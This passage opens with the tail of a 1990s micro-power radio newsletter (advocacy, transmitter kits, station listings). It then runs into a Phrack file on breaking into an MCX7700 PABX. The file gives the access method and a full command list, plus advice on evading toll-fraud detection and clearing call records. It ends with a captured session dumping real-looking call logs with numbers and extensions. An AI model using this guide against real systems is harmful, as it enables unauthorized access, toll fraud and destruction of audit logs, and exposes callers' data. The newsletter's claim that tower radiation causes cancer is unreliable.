  16799. I assumed it was probably some policy they were following.  That was
  16800. my first, and so far only, FCC inspection.
  16801.  
  16802. Don Hackler  - donh@shakala.com Shakala BBS (ClanZen Radio Network)
  16803. Sunnyvale, CA 1-408-734-2289
  16804.  
  16805. ---------------------------------------------------------------------------
  16806.  
  16807.              ***** Why Support Micro-Power Broadcasting? *****
  16808.  
  16809.  
  16810.      Number One:  The issue is freedom of speech.  It's truly
  16811. shocking what the Federal Communications Commission has allowed to
  16812. happen. Media access is becoming too restricted for regular people
  16813. to get their message across.  As each day passes,  radio, television,
  16814. and newspaper media gets gobbled up pac-man style by big outfits like
  16815. Sony/CBS, GE/NBC, ATT,  ABC, Time-Warner Communications, Hearst, Gannett,
  16816. Disney, Ted Turner, or even Fox.  Our local media mogul, James Gabbert,
  16817. owns an AM, FM, and television station in the same area.  Middle America
  16818. gets bombarded with religious broadcasters and urban areas get millions
  16819. of watts of commercial crap beaming out from huge towers.  Arbitron
  16820. and Neilson decide which stations have what percentage of the listening
  16821. audience.  This situation must be changed so that truly free communication
  16822. can have a chance to survive.  In the 90's we need some space on the
  16823. broadcast bands for community radio and television.  Cable TV is promising
  16824. hundreds of channels to choose from, but most of this stuff will be
  16825. generated by the existing media networks.  The problem here is that
  16826. minority opinions are not heard.  Censorship can not be tolerated
  16827. in a democratic society.  Freedom of information is what we need.
  16828.      Number Two:  The technology has changed.  It used to be very expensive
  16829. to run a radio station.  With modern electronics, however, small radio
  16830. stations can be on the air with a minimal investment.  In fact, people
  16831. in Japan have been doing micro-power broadcasting  for years.  Most
  16832. people in the U.S. just have AM, FM, and TV receivers.  To reach these
  16833. people, you usually have to buy advertising time on a commercial station.
  16834. That's assuming some station is willing to broadcast your tape!  What we
  16835. want is true public access to the airwaves for everyone, not just
  16836. the rich and powerful.  The cloud of secrecy about broadcasting has
  16837. lifted and now we know that media power has been stolen by our own
  16838. government,  and sold to the highest bidder.  People need media access
  16839. because human beings have a natural need to communicate with each
  16840. other.   Cable TV and Audio service should feature input from the
  16841. community at large.  The old concept of standing on a soap box and
  16842. calling out to your fellow citizens will not work in the computer
  16843. age.
  16844.      Number Three:  Health Concerns about Radio energy, in large doses,
  16845. it is considered by some to be a real health hazard. Incidence of
  16846. leukemia and cancer runs high among men who work on high power transmitting
  16847. towers.  People in San Francisco get blasted with literally millions
  16848. of watts of energy coming from Sutro Tower.  This is because some
  16849. radio and television stations want to be picked up 100 miles away.
  16850. Scientific opinion on the effects of exposure to radio waves varies quite a
  16851. bit, but if you're one of those people living up near Sutro Tower, maybe
  16852. you should move.  Micro-power is the sane way to use radio and tv.  The
  16853. space on the radio and tv dial should be spread around to all interested
  16854. parties, not just a small group of companies.  Broadcast power levels
  16855. for all stations should come down to safer levels.
  16856.  
  16857. -Paul Griffin
  16858.  
  16859.  
  16860. ---------------------------------------------------------------------------
  16861.  
  16862.                  ***** KITS FROM FREE RADIO BERKELEY *****
  16863.  
  16864.  
  16865. First, a word from our legal department:
  16866.  
  16867. For educational purposes only.  These kits are offered for the furtherance
  16868. of one's knowledge regarding radio frequency design and principles.  At all
  16869. times during operation the assembled unit must be connected to a dummy
  16870. load.  Part 15 of the FCC rules prohibits an antenna being used with these
  16871. units.  All responsibilities for the ultimate use of these kits are born
  16872. solely by the builder and/or operator.
  16873.  
  16874.  
  16875. KITS AVAILABLE NOW !
  16876.  
  16877.  
  16878. All kits are complete and come with professionally manufactured, drilled
  16879. and tinned PC boards.  All coils are pre-wound.  Each unit, unless
  16880. specified, requires 12 volts for proper operation.  Full instructions and
  16881. diagrams included.
  16882.  
  16883.  
  16884. 5 Watt FM Transmitter - $45
  16885.  
  16886.      An improved version of the Panaxis 5 watt design with a much more
  16887. rugged output transistor capable of producing 6-7 watts.  Oscillator is a
  16888. stable FET based VFO.
  16889.  
  16890.  
  16891. 6 watt RF Amplifier - $25
  16892.  
  16893.      Uses the same output transistor as above.  Will produce 6 watts for
  16894. 1/2 watt input drive.  Easy, quick assembly.
  16895.  
  16896.  
  16897. 15 watt RF Amplifier - $35
  16898.      Uses a very high gain (14dB) RF transistor to boost a 1/2 watt input
  16899. to 15 watts.  Complete with PC Board and all required parts.
  16900.  
  16901.  
  16902. 25-30 watt RF Amplifier - $35
  16903.  
  16904.      Will produce full power with an input drive of 4-5 watts.
  16905.  
  16906.  
  16907. 1/2 to 1 watt Amplifier - $18
  16908.  
  16909.      1/2 to 1 watt output for an input power of 10 mw.  Great for boosting
  16910. lower power VFOs.
  16911.  
  16912.  
  16913. Output Filter Kit - $5.00
  16914.  
  16915. A seven element low pass filter, composed of 4 coils and 3 capacitors, to
  16916. flatten those harmonics.  Specify cutoff frequency desired.
  16917.  
  16918.  
  16919. COMING REAL SOON !
  16920.  
  16921.  
  16922. 1/2 - 1 watt Stereo Broadcast Transmitter - $35
  16923.  
  16924.      A vast improvement over the Ramsey FM-10.  It uses the BA1404 IC as a
  16925. stereo modulator only to modulate a FET vfo, buffer and amp chain.  Better
  16926. audio input filtering and bypassing.  IC voltage regulation for the 2.5
  16927. volt supply for the BA1404.  A very rugged output stage and collector
  16928. voltage bypassing make this unit stand out from all other transmitter
  16929. designs using the BA1404 chip.
  16930.  
  16931.  
  16932. Stereo Audio Processor - $Price to be determined
  16933.  
  16934. A combined stereo generator using the BA1404 coupled with compandor ICs for
  16935. compression and limiting of audio signals
  16936.  
  16937.  
  16938. If you have any other particular requirements please let us know.  Custom
  16939. design and fabrication services are available including PC layout and
  16940. production.  Full CAD services as well.
  16941.  
  16942.  
  16943. Proceeds from the sales of these kits go to the furtherance of micro power
  16944. broadcasting, bringing a voice of empowerment to every community.
  16945.  
  16946. Please add $3.00 for handling and shipping for each kit.
  16947.  
  16948. Payment to be made out to cash or to Stephen Dunifer, we are still working
  16949. out the bank trip.  Send to:
  16950.  
  16951. Free Radio Berkeley
  16952. 1442 A Walnut St., #406
  16953. Berkeley, CA 94709
  16954.  
  16955. Voice mail:  (510) 464-3041
  16956.  
  16957. ---------------------------------------------------------------------------
  16958.  
  16959.                                 On the Air
  16960.  
  16961. Free Radio Berkeley - Sundays from 9 PM to 12 Midnight at 88.1 FM.  Call
  16962. their voice mail # (510) 464-3041 for further information.  Or write them:
  16963. 1442 A Walnut St., #406, Berkeley, 94709.
  16964.  
  16965. San Francisco Liberation Radio - Wednesdays & Saturdays from 8 PM to 10 PM
  16966. at 93.7 FM.  Call their voice mail # (415) 487-6308 for further information
  16967. and to help out.  Or write them: San Francisco Liberation Radio, 350 7th.
  16968. Ave, Box35, San Francisco CA, 94118.
  16969.  
  16970. Southern Marin, San Rafael Area - schedule  not known at this time, try
  16971. 87.9 FM.
  16972.  
  16973. Southern Marin, Sausalito - left end of the dial most every night, try 87.9
  16974. FM.
  16975.  
  16976. Mission District, SF - LaRaza station, schedule not known, try 87.9 FM
  16977.  
  16978. Santa Cruz - Either on the air or soon to be, schedule & frequency not
  16979. known at this time
  16980.  
  16981.      More stations taking to the air all the time, look for a whole network
  16982. to be happening in Berkeley.  An attendee of the New York City workshop is
  16983. on the air in Connecticut with 5 watts as Ragged Mountain Liberation Radio.
  16984. Phone calls are coming in from around the country, keep those calls and
  16985. letters coming.
  16986.      From San Francisco Liberation Radio:  Each SFLR program closes with
  16987. the words: "Fascists are like cockroaches.  Shine a light on them and they
  16988. scurry away.  And together, you and I can be the light."  Richard Edmondson
  16989. of SFLR, author of that slogan, said, "Well, first and foremost of all it
  16990. seemed like a truism, and it seemed like the sort of phrase to end a radio
  16991. program with - catchy."
  16992.      Stephen Dunifer with Free Radio Berkeley added, "Yes, but cockroaches
  16993. do not carry guns".  One of Free Radio Berkeley's favorite tag lines is
  16994. "Are you going to continue to live the lie or are you going to act the truth
  16995. ?
  16996.      Both San Francisco Liberation Radio and Free Radio Berkeley have been
  16997. carrying a lot of very diverse and interesting programming ranging from
  16998. Food Not Bombs Radio Network programs to Jello Biafra declaring that
  16999. Urinalysis is Freedom to local street interviews to an interview with the
  17000. former program director at Pacicifa station WPFW in Washington, DC.  If you
  17001. are interested in producing programs, conducting news gathering and
  17002. interviews, etc. or have tapes of your band, performance piece, etc.  or
  17003. wish to help out in any other way, please contact either Free Radio
  17004. Berkeley or San Francisco Liberation Radio.  Tapes may be mailed to the
  17005. return address on this newsletter in care of Free Radio Berkeley.  Let your
  17006. voices and performance art be heard !
  17007.  
  17008. ---------------------------------------------------------------------------
  17009.  
  17010.                                In the Media
  17011.  
  17012.      Within the last few months, a considerable amount of media attention
  17013. has been focused on Micropower Broadcasting.  Articles have appeared in the
  17014. East Bay Express, SF Weekly, Bay Guardian, Oakland Tribune, San Jose
  17015. Mercury, Daily Cal, SF Chronicle, Berkeley Voice and New York Daily News.
  17016. CNN put together a  news story about Free Radio Berkeley which aired
  17017. nationally and was picked up and rebroadcast by Channel 2 in Oakland.
  17018.      More coverage is expected to be forthcoming.  An article may appear in
  17019. the New York Times.  KQED radio is working on a story.  A fifteen page
  17020. article on guerilla media will be in Mondo 2000, due out the first of
  17021. November.  Channel 31 (Marin County) is covering one of the broadcast
  17022. operations in San Rafael.  A press and info packet is going to be sent out
  17023. around the country.  Any help you can offer in the area of community and
  17024. media outreach would be greatly appreciated.  It is our intent to build an
  17025. international movement and coalition.  Contact the Free Communications
  17026. Coalition (510) 464-3041
  17027.  
  17028. ---------------------------------------------------------------------------
  17029.  
  17030.                          FUND RAISING VIDEO PARTY
  17031.  
  17032.            Featuring: Pump Up the Volume, Medium Cool and videos
  17033.                         from Black Liberation Radio
  17034.  
  17035. Saturday, November 13 - 8 PM
  17036. 809 B Allston Way, Berkeley
  17037.  
  17038. (two blocks south of University Ave., between 5th and 6th streets)
  17039.  
  17040.      $5-? donation.  Free popcorn provided.  Help us pay our operational
  17041. expenses.
  17042.  
  17043. ___________________________________________________________________________
  17044.  
  17045.  
  17046.                         HELP TAKE BACK THE AIRWAVES
  17047.                   FREE COMMUNICATIONS COALITION MEETING
  17048.  
  17049. Saturday, November 13 - 5 PM
  17050. 809 B Allston Way, Berkeley
  17051.  
  17052.      With the dramatic increase in publicity (Free Radio Berkeley made the
  17053. front page of the Sunday New York Times - Oct. 24) and response we have
  17054. experienced in the last month or so, it is rather important that all of us
  17055. who are concerned with the defense, support and promotion of micro power
  17056. broadcasting come together to plan and create a strategy which will lead to
  17057. the Free Communications Coalition (the Peoples' FCC) becoming an
  17058. international umbrella under which micropower broadcasting can flourish.
  17059.  
  17060.      To that end, you are invited to attend the meeting of the Free
  17061. Communications Coalition on Saturday, November 13 at 5 PM.  It will be held
  17062. at 809 B Allston Way (between 5th & 6th streets) in Berkeley.  This will be
  17063. a pot luck dinner meeting, bring a vegetarian dish to share.  Following, at
  17064. 8PM will be a video benefit, see above for further details.                              ==Phrack Magazine==
  17065.  
  17066.                  Volume Five, Issue Forty-Five, File 25 of 28
  17067.  
  17068. ****************************************************************************
  17069.  
  17070.  
  17071.  ///////////////          THE MCX7700 PABX SYSTEM            ////////////////
  17072. ///////////////   Brought to you courtesy of [)elamo Labz   ////////////////
  17073. //////////////    and the ChUrCH oF tHE Non-CoNForMiST++  ////////////////
  17074.                (warespeoplessuckwarespeoplessucksuksuk)
  17075.  
  17076. Greetings from myself, The Evil [)r. [)elam!
  17077.  
  17078. In this text file I present a PBX that identifies itself as an "MCX7700"...
  17079. probably the easiest PBX hack you'll find, and not a bad system... I've seen
  17080. worse.
  17081.  
  17082.  
  17083.  
  17084. Dis'-claimer: (This is the part where I get to Dis' the system.)
  17085. -------------
  17086. This particular system is wide open and it's not my problem the owners
  17087. decided to buy a lame system.  Via freedom of the press I am publishing
  17088. my findings, so if anyone gets pissed off about this file *PHUCK 0FF*!
  17089.  
  17090.  
  17091.  
  17092. Ab-Using the system:
  17093. --------------------
  17094. Once a data connection is established, press the '*' key to enter
  17095. programming mode.  In programming mode, all commands are given as 2 digit
  17096. combinations.  Some of the commands are macros of other commands. Example:
  17097. command 50 will do a command 15 plus enter a response to the question "Clear
  17098. all call records Yes/No".  This particular system uses only extensions..
  17099. not accounts, but has the capability to do both.  The system sends EOF
  17100. (CTRL-Z) characters after every command, this is NOT something I typed.
  17101. I replaced all occurrences of CTRL-Z characters with <-CTRL Z-> in this phile
  17102. for obvious reasons.
  17103.  
  17104.  
  17105.  
  17106. Note to |<odez |<iddiez:
  17107. ------------------------
  17108. For all you kiddiez who think you can bang the fuck outta codez and never
  17109. get caught, you might think again after reading this phile.  Command 55
  17110. "Exceptions report" is most likely what the system owner looks at every
  17111. month.  The report includes Most Expensive Calls, Longest Calls, and Most
  17112. Frequently Called Numbers.  Avoiding being caught is as simple as hiding
  17113. among the rest of the crowd. I.E. don't fucking call Japan or stay on for 8
  17114. hours, and don't call the same BBS 100 times on a code in a month.  The
  17115. administrator most likely will glance at the printout and see which
  17116. department has a fuckup in it who calls his mistress in Egypt every day, and
  17117. go rag him out... if you're not one of the top in the exceptions report,
  17118. chances are they'll never know.  If you happen to have the dataline to the
  17119. PBX then who the fuck cares.. just clear the fucking call records.
  17120.  
  17121.  
  17122. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  17123.  
  17124.  
  17125. List of Commands:
  17126. -----------------
  17127. 00 Terminate programming
  17128. 10 System parameters menu (PRINTER = 1 / PABX = 2 / REPORT = 3 / OPTIONS = 4)
  17129. 11 Change current time
  17130. 12 Change current date
  17131. 15 Clear all call records Y/N
  17132. 16 Set start date
  17133. 17 Set trunk assignments
  17134. 18 Set group number
  17135. 19 "STORED NUMBER ENTRY, 4=ABVD, 5-8=OCC ?"
  17136. 30 Show system parameters
  17137. 31 Summary of extensions sort
  17138. 32 Summary of accounts sort
  17139. 33 Summary of departments sort
  17140. 34 Summary of company sort
  17141. 35 Summary of trunks sort
  17142. 36 Report of all call records
  17143. 37 Show trunk assignments
  17144. 38 Show extension/department assignments
  17145. 39 Show stored numbers
  17146. 43 <this command froze>
  17147. 44 Reports a number
  17148. 45 ?
  17149. 46 Block Check
  17150. 50 Clear all call records macro.. pipes a yes into command 15
  17151. 51 <terminated programming>
  17152. 52 <terminated programming>
  17153. 53 Sort call stats by a specified phone number
  17154. 54 Area code sort
  17155. 55 Exceptions reports (Most expensive / longest / most frequent calls)
  17156. 60 "INTERACTIVE MODE"
  17157. 61 <strange>
  17158. 62 <nothing>
  17159. 63 <this command froze>
  17160. 64 Displays a number (5997777B)
  17161. 65 Displays system type (MCX-7700/PC V4.0.5  1189)
  17162. 67 Set SMDR input
  17163. 68 Display SMDR inputs
  17164. 69 <shows a line of numbers 01-79>
  17165. 70 Full buffer program
  17166. 71 Auto report program 1
  17167. 72 Auto report program 2
  17168. 73 Set index number
  17169. 74 Set rate table
  17170. 75 Rate table sizes
  17171. 76 Pricing types
  17172. 79 <nothing>
  17173. 80 <strange>
  17174. 90 Display full buffer program
  17175. 91 Display auto report program 1
  17176. 92 Display auto report program 2
  17177. 93 List index table
  17178. 94 List rate table
  17179. 95 Display rate table sizes
  17180. 96 Display pricing types
  17181. 97 Invalid command
  17182. 98 Invalid command
  17183. 99 Call record dump
  17184.  
  17185.  
  17186. "*" key starts programming mode
  17187. <ESC> key aborts commands: "+++ FUNCTION CANCELED +++"
  17188.  
  17189.  
  17190. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  17191. Here's a capture from a session online. (edited for brevity)
  17192. Settings: Wordlength 8, Parity None, Stop bits 1
  17193. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  17194.  
  17195. CONNECT 1200
  17196.  
  17197. << Pressed '*' key >>
  17198.  
  17199. PROGRAMMING ENABLED 09/05/92  8:31A
  17200. <-CTRL Z->
  17201. COMMAND ?15
  17202. CLEAR CALL RECORDS - ARE YOU SURE ? <-CTRL Z->
  17203. COMMAND ?17
  17204. SET TRUNK ASSIGNMENTS
  17205.  
  17206. POSITION ? -+++ FUNCTION CANCELED +++
  17207. <-CTRL Z->
  17208. COMMAND ?30
  17209.  
  17210. SYSTEM PARAMETERS]
  17211.  
  17212. PRTR  DIAGNOSTICS  SMDR  FORM-FEED     EXPAND      ESC
  17213. TYPE  A    R    D  BAUD  SIM   LNG   ON     OFF    SEQ
  17214.  2    N    N    N    2    N    66    014    015    000
  17215.  
  17216.  ACCOUNTS      ------TRUNKS------   EXT   ACCESS   TOLL
  17217. SIZE    NO.    NO.   '-'  GRP  EQP SIZE  ABS  COST DIG
  17218.  04    1024    040    N    2    3    3    Y    N    1
  17219.  
  17220. CALL   ----DROP OR REJECT---  AUTO  TO-  LIST
  17221. GRACE LOC  ACT  INC  TRK  EXT  PRD  DAY  NULL
  17222.  05    N    N    N    N    N    0    Y    N
  17223.  
  17224. SER  PC   ZERO
  17225. IAL  PORT  OPR
  17226.  Y    Y    Y
  17227.  
  17228. <-CTRL Z->
  17229. COMMAND ?35
  17230. TRUNK USAGE SORT: SUMMARY ?Y
  17231.                        SUMMARY OF TRUNK USAGE
  17232.  
  17233.  
  17234.     REPORT PERIOD                                                    PAGE  1
  17235.     09/01/92 - 09/05/92                                     09/05/92   8:35A
  17236.  
  17237.      TRUNK       TOTAL       TOTAL       AVG TIME     COSTED         TOTAL
  17238.      USED        CALLS       TIME        PER CALL      TIME          COST
  17239.     ------      ------      -------      --------     ------      ----------
  17240.       8080           0           0          0.0            0      $     0.00
  17241.       8086           0           0          0.0            0      $     0.00
  17242.       8087           0           0          0.0            0      $     0.00
  17243.      80001           9          47          5.2           12      $     3.11
  17244.      80002           6          12          2.0            7      $     2.13
  17245.      80003          17          57          3.3            7      $     2.21
  17246.      80004          12          35          2.9            9      $     2.21
  17247.      80005          12          15          1.2            4      $     1.50
  17248.      80006          13          24          1.8            0      $     0.00
  17249.      80007           6          19          3.1            9      $     2.42
  17250.      80008          12          39          3.2            1      $     0.25
  17251.      80009          10          45          4.5           17      $     4.50
  17252.      80010           8          42          5.2            9      $     2.30
  17253.      80011          14          46          3.2           10      $     2.61
  17254.      80012          11          98          8.9           70      $    16.14
  17255.      80013           8          26          3.2            3      $     1.21
  17256.      80014          13          34          2.6           12      $     3.03
  17257.      80015          14          32          2.2            5      $     1.50
  17258.      80016           0           0          0.0            0      $     0.00
  17259.      86001           0           0          0.0            0      $     0.00
  17260.      86003           0           0          0.0            0      $     0.00
  17261.      87001          82         270          3.2          270      $    60.31
  17262.      87002          79         256          3.2          256      $    59.52
  17263.      84002           0           0          0.0            0      $     0.00
  17264.      95001           0           0          0.0            0      $     0.00
  17265.                      0           0          0.0            0      $     0.00
  17266.     ------      ------      -------      --------     ------      ----------
  17267.      TOTAL         326        1097          3.3          701      $   164.95
  17268.  
  17269.  
  17270. <-CTRL Z->
  17271. COMMAND ?36
  17272. CALL RECORD DUMP :
  17273.  DETAIL?Y
  17274.               REPORT OF ALL CALL RECORDS
  17275.  
  17276.  
  17277.     REPORT PERIOD                                                    PAGE  1
  17278.     09/01/92 - 09/05/92                                     09/05/92   8:36A
  17279.  
  17280.   EXTEN-  TRUNK      NUMBER                      DURATION             ACCOUNT
  17281.    SION   USED       DIALED        DATE    TIME   MINUTES   COST        CODE
  17282.   ------ ------ ---------------- -------- ------ -------- -------- ------------
  17283.     718   80009    (   )911-0000 09/01/92  7:55A     0.5  $    .00
  17284.     311   80011    (   )911-0000 09/01/92  7:55A     1.3  $    .00
  17285.     278   80009    (800)944-1535 09/01/92  8:16A     3.0  $    .00
  17286.     255   80005    (800)944-1535 09/01/92  8:19A     1.3  $    .00
  17287.     261   87001    (   )660-5525 09/01/92  8:28A     4.2  $    .95
  17288.     201   80004    (800)944-1535 09/01/92  8:33A     1.9  $    .00
  17289.     315   87002    (   )841-2586 09/01/92  8:34A     2.3  $    .57
  17290.     314   87001    (   )290-1030 09/01/92  8:44A     3.4  $    .76
  17291.     735   87002    (813)293-4319 09/01/92  8:44A     2.5  $    .71
  17292.     735   87002    (813)293-4319 09/01/92  8:58A     1.2  $    .49
  17293.     255   80009    (800)944-1535 09/01/92  8:56A     6.9  $    .00
  17294.     247   80015    (800)944-1535 09/01/92  9:02A     3.7  $    .00
  17295.     261   80011  O (513)825-3931 09/01/92  9:09A     3.6  $    .00
  17296.     261   87001    (   )644-1061 09/01/92  9:16A     1.3  $    .38
  17297.  
  17298. <<ETC....>>
  17299.  
  17300. <-CTRL Z->
  17301. COMMAND ?00]
  17302. PROGRAMMING TERMINATED
  17303.  
  17304. PROGRAMMING ENABLED 09/05/92  8:40A
  17305. <-CTRL Z->
  17306. COMMAND ?37
  17307.  ]TRUNK ASSIGNMENTS
  17308.  
  17309. 09/05/92   8:40A  PAGE  1
  17310.  
  17311.  
  17312. TRUNK 000 =      ,00      TRUNK 001 =  8080,01      TRUNK 002 =  8086,01
  17313. TRUNK 003 =  8087,01      TRUNK 004 =      ,00      TRUNK 005 =      ,00
  17314. TRUNK 006 =      ,00      TRUNK 007 =      ,00      TRUNK 008 =      ,00
  17315. TRUNK 009 =      ,00      TRUNK 010 =      ,00      TRUNK 011 =      ,00
  17316. TRUNK 012 =      ,00      TRUNK 013 =      ,00      TRUNK 014 =      ,00
  17317. TRUNK 015 =      ,00      TRUNK 016 = 80001,01      TRUNK 017 = 80002,01
  17318. TRUNK 018 = 80003,01      TRUNK 019 = 80004,01      TRUNK 020 = 80005,01
  17319. TRUNK 021 = 80006,01      TRUNK 022 = 80007,01      TRUNK 023 = 80008,01
  17320. TRUNK 024 = 80009,01      TRUNK 025 = 80010,01      TRUNK 026 = 80011,01
  17321. TRUNK 027 = 80012,01      TRUNK 028 = 80013,01      TRUNK 029 = 80014,01
  17322. TRUNK 030 = 80015,01      TRUNK 031 = 80016,01      TRUNK 032 = 86001,01
  17323. TRUNK 033 = 86003,01      TRUNK 034 = 87001,01      TRUNK 035 = 87002,01
  17324. TRUNK 036 = 84002,01      TRUNK 037 = 95001,01      TRUNK 038 =      ,00
  17325. TRUNK 039 =      ,00      TRUNK 040 =      ,00
  17326. <-CTRL Z->
  17327. COMMAND ?15
  17328. CLEAR CALL RECORDS - ARE YOU SURE ? Y END DATE NOT FOUND -- CLEAR ALL ??<-CTRL Z->
  17329. << Nice command!.. 50 is a macro using command 15  with a Y piped into it >>
  17330. OK
  17331. 51
  17332. <-CTRL Z->]
  17333. <-CTRL Z->
  17334. COMMAND ?54
  17335. AREA CODE SORT
  17336.  
  17337.                         SUMMARY OF AREA CODES
  17338.  
  17339.  
  17340.     REPORT PERIOD                                                    PAGE  1
  17341.     09/01/92 - 09/05/92                                     09/05/92   9:15A
  17342.  
  17343.      AREA       TOTAL        TOTAL      AVG TIME      AVERAGE        TOTAL
  17344.      CODE       TIME         CALLS      PER CALL       COST          COST
  17345.     ------     -------      ------      --------     --------     ----------
  17346.       ***         357          139         2.5       $    .52     $    72.89
  17347.       212          24            8         3.0       $    .84     $     6.75
  17348.       215           1            1         1.0       $    .46     $     0.46
  17349.       216           4            1         4.0       $    .92     $     0.92
  17350.       303           6            3         2.0       $    .58     $     1.75
  17351.       305           3            2         1.5       $    .38     $     0.77
  17352.       404           4            2         2.0       $    .69     $     1.38
  17353.       504           3            2         1.5       $    .46     $     0.92
  17354.       508           5            4         1.2       $    .37     $     1.50
  17355.       513          11            2         5.5       $    .80     $     1.61
  17356.       516          19            4         4.7       $   1.18     $     4.75
  17357.       606          11            1        11.0       $   2.53     $     2.53
  17358.       612           1            1         1.0       $    .50     $     0.50
  17359.       615           5            1         5.0       $   1.15     $     1.15
  17360.       703           9            1         9.0       $   2.30     $     2.30
  17361.       708           9            3         3.0       $   1.00     $     3.00
  17362.       800         371          109         3.4       $    .00     $     0.00
  17363.       813          96           21         4.5       $   1.11     $    23.49
  17364.       818           1            1         1.0       $    .50     $     0.50
  17365.       904          93           19         4.8       $   1.21     $    23.06
  17366.       912          64            1        64.0       $  14.72     $    14.72
  17367.     ------     -------      ------      --------     --------     ----------
  17368.      TOTAL       1097          326         3.3       $    .50     $   164.95
  17369.  
  17370. <-CTRL Z->
  17371. COMMAND ?55
  17372. EXCEPTION REPORTS
  17373.  
  17374.               REPORT OF MOST EXPENSIVE CALLS
  17375.  
  17376.  
  17377.     REPORT PERIOD                                                    PAGE  1
  17378.     09/01/92 - 09/05/92                                     09/05/92   9:16A
  17379.  
  17380.     EXTEN-   TRUNK       NUMBER                           DURATION
  17381.      SION    USED        DIALED          DATE      TIME    MINUTES    COST
  17382.     ------  ------  ----------------   --------   ------  --------  --------
  17383.       246    80012     (912)354-2813   09/01/92    2:33P     63.5   $  14.72
  17384.       316    87001     (813)299-2068   09/03/92    4:16P     36.9   $   8.19
  17385.       248    87002     (   )863-5701   09/03/92   11:28A     21.5   $   4.89
  17386.       261    87002     (904)677-1235   09/03/92    2:20P     15.3   $   3.72
  17387.       261    87002     (904)677-1235   09/01/92    3:36P     13.1   $   3.26
  17388.       255    87001     (813)293-4319   09/04/92    9:36A     13.6   $   3.13
  17389.       270    87002     (   )649-4966   09/04/92   11:32A     14.3   $   2.85
  17390.       261    87001     (   )660-5567   09/01/92   10:16A     14.8   $   2.85
  17391.       200    87002     (904)599-1543   09/03/92    3:27P     11.2   $   2.80
  17392.       266    80009     (516)785-1200   09/03/92    3:32P     10.5   $   2.75
  17393.       261    87001     (   )660-5525   09/04/92   12:48P     13.2   $   2.66
  17394.       268    80014     (606)282-7223   09/03/92   11:00A     10.9   $   2.53
  17395.       246    87002     (904)677-2551   09/03/92    3:05P      9.7   $   2.34
  17396.       261    80010     (703)845-1400   09/01/92    9:23A      9.1   $   2.30
  17397.       316    87002     (   )290-1030   09/02/92    3:04P     11.8   $   2.28
  17398.       246    87002     (904)677-6774   09/01/92    2:20P      8.5   $   2.11
  17399.       316    87001     (   )290-1030   09/03/92    2:58P     10.5   $   2.09
  17400.       316    87001     (   )290-1030   09/02/92    8:56A      9.6   $   1.90
  17401.       316    80004     (212)605-8586   09/02/92    1:58P      6.9   $   1.75
  17402.       270    80001     (513)568-4933   09/03/92    9:15A      7.0   $   1.61
  17403.  
  17404.  
  17405.               REPORT OF LONGEST CALLS
  17406.  
  17407.  
  17408.     REPORT PERIOD                                                    PAGE  1
  17409.     09/01/92 - 09/05/92                                     09/05/92   9:16A
  17410.  
  17411.     EXTEN-   TRUNK       NUMBER                           DURATION
  17412.      SION    USED        DIALED          DATE      TIME    MINUTES    COST
  17413.     ------  ------  ----------------   --------   ------  --------  --------
  17414.       246    80012     (912)354-2813   09/01/92    2:33P     63.5   $  14.72
  17415.       316    87001     (813)299-2068   09/03/92    4:16P     36.9   $   8.19
  17416.       261    80001     (800)727-5663   09/04/92    2:06P     25.8   $    .00
  17417.       248    87002     (   )863-5701   09/03/92   11:28A     21.5   $   4.89
  17418.       261    87002     (904)677-1235   09/03/92    2:20P     15.3   $   3.72
  17419.       261    87001     (   )660-5567   09/01/92   10:16A     14.8   $   2.85
  17420.       270    87002     (   )649-4966   09/04/92   11:32A     14.3   $   2.85
  17421.       255    87001     (813)293-4319   09/04/92    9:36A     13.6   $   3.13
  17422.       261    87001     (   )660-5525   09/04/92   12:48P     13.2   $   2.66
  17423.       261    87002     (904)677-1235   09/01/92    3:36P     13.1   $   3.26
  17424.       260    80003     (800)999-4441   09/03/92   11:49A     12.9   $    .00
  17425.       270    80010     (800)342-3763   09/02/92    3:32P     12.5   $    .00
  17426.       316    87002     (   )290-1030   09/02/92    3:04P     11.8   $   2.28
  17427.       252    80015     (800)944-1535   09/04/92    9:00A     11.5   $    .00
  17428.       252    80008     (800)944-1535   09/02/92   11:07A     11.5   $    .00
  17429.       200    87002     (904)599-1543   09/03/92    3:27P     11.2   $   2.80
  17430.       315    80009     (800)622-4448   09/02/92   10:33A     11.2   $    .00
  17431.       268    80014     (606)282-7223   09/03/92   11:00A     10.9   $   2.53
  17432.       315    80011     (800)622-4448   09/02/92    3:35P     10.8   $    .00
  17433.       264    80012     (800)527-2274   09/03/92    3:12P     10.7   $    .00
  17434.  
  17435.  
  17436.            REPORT OF MOST FREQUENT NUMBERS
  17437.  
  17438.  
  17439.     REPORT PERIOD                                                    PAGE  1
  17440.     09/01/92 - 09/05/92                                     09/05/92   9:16A
  17441.  
  17442.          NUMBER             TOTAL        TOTAL         AVRG          TOTAL
  17443.          DIALED             CALLS        TIME          DRTN          COST
  17444.     ----------------       ------       -------       -----       ----------
  17445.        (   )290-1030           53          131          2.4       $    27.91
  17446.        (800)944-1535           37          121          3.2       $     0.00
  17447.        (800)812-5386           15           15          1.0       $     0.00
  17448.        (   )411-0000           13           13          1.0       $     0.00
  17449.        (   )660-5525           13           36          2.7       $     7.98
  17450.        (813)293-4319           11           38          3.4       $     9.35
  17451.        (904)677-1235            9           46          5.1       $    11.43
  17452.        (800)622-4448            8           45          5.6       $     0.00
  17453.        (   )660-5524            5           11          2.2       $     2.02
  17454.        (   )295-9119            5           11          2.2       $     2.28
  17455.        (   )660-5528            5           13          2.6       $     2.47
  17456.        (516)785-1200            4           19          4.7       $     4.75
  17457.        (800)342-3064            4            4          1.0       $     0.00
  17458.        (800)888-6823            4           16          4.0       $     0.00
  17459.        (   )660-5543            4            4          1.0       $     1.14
  17460.        (508)960-6186            4            5          1.2       $     1.50
  17461.        (800)526-4371            3            6          2.0       $     0.00
  17462.        (   )863-5701            3           32         10.6       $     7.19
  17463.        (212)708-1728            3           10          3.3       $     2.75
  17464.        (303)586-2030            3            6          2.0       $     1.75
  17465.  
  17466. <-CTRL Z->
  17467. COMMAND ?65
  17468. MCX-7700/PC V4.0.5  1189
  17469. EB4B     E46D     1265     0101
  17470. <-CTRL Z->
  17471. COMMAND ?10
